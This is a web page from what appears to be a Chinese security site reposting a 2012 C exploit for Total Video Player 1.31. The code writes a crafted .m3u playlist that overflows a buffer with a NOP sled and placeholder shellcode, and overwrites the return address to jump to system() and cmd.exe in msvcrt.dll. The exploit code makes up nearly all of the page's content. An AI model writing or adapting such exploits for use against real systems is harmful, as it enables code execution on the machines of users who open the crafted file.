首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Total Video Player V1.31 m3u playlist exploit
来源:aksuumit[at]hotmail.com 作者:GoTr00t 发布时间:2012-08-29  
/*
28-08-2012 
Total Video Player V1.31 m3u playlist exploit
Local Exploit
Written by GoTr00t
Tested on Windows 7
aksuumit[at]hotmail.com
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>


int main()
{                          
    char exploit[3000];
    memset(exploit,0x00,sizeof(exploit));
    
    char overflow[304];
    memset(overflow,0x41,sizeof(overflow)-1);
    
    char nops[40];
    memset(nops,0x90,sizeof(nops));
    
    char shellcode[160];
    memset(shellcode,0x55,sizeof(shellcode)); 
    
    char HEADER[] = "#EXTM3U\n#EXTINF:,\n";
    
    // 7694B177 address of system in the msvcrt.dll 
    char newEIP[] = "\x77\xB1\x94\x76";
    
    strcpy(exploit,HEADER);
    strcat(exploit,"c:\\");
    strcat(exploit,overflow);
    strcat(exploit,nops);       
    strcat(exploit,shellcode); // fake shellcode because there are multiple ways to exploit this vulnerability you can place a shellcode here 
    strcat(exploit,newEIP);    // and use this EIP to jump to the shellcode  but for this example i use a return2dll technique
    strcat(exploit,"\x44\x44\x44\x44"); // junk or you can use this one to jump to another dll to execute so you can do a ROP to bypass protection
    
    // 7638BF27  cmd.exe
    strcat(exploit,"\x27\xBF\x38\x76");
    
    // Write a exploit playlist 
    FILE *fp = fopen("exploit.m3u","w");
    fprintf(fp,exploit);
    fclose(fp);
    
    printf("Exploit written!\n");
    
    return 0;    
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Java 7 Applet Remote Code Exec
·Simple Web Server 2.2-rc2 ASLR
·Zabbix Server Arbitrary Comman
·ActFax 4.31 Local Privilege Es
·Java 7 Applet Remote Code Exec
·Winlog Lite SCADA HMI system S
·Express Burn Plus 4.58 Buffer
·WireShark 1.8.2 & 1.6.0 Buffer
·AP NetWeaver HostControl Comma
·XODA 0.4.5 Arbitrary PHP File
·Internet Download Manager All
·Vice City Multiplayer Server 0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved